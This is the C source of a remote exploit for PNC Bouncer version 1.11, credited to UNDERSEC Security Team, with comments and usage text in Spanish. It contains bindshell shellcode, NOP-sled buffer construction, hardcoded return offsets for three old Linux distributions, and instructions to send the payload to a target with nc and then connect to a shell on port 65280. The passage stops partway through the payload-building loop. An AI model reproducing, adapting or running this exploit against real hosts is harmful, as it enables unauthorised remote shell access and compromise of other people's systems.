/* PNC Bouncer Xploit por RaiSe */ /* Testeado en version 1.11 */ /* */ /* Offset en RedHat 6.0 0xbffffb24 */ /* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */ /* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */ /* bindshell by ADM */ /* */ /* UNDERSEC Security Team */ /* http://www.undersec.com */ #include int i; char *ptr; unsigned long *ptr2,dire; char bindshell[] = "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06" "\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62" "\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0" "\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89" "\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd" "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d" "\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0" "\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04" "\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80" "\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1" "\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46" "\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff" "\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77"; char buffer[1091]; int main(int argc, char *argv[]) { if (argc<3) { printf("\nPNC Bouncer Xploit por RaiSe"); printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com"); printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]); printf(" nc host 65280\n\n"); printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n"); exit(0); } if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; } if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; } if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; } for(i=0;i<1091;i++) buffer[i]=0x00; ptr=buffer; for(i=0;i<1011-strlen(bindshell);i++) *(ptr++)=0x90; for(i=0;i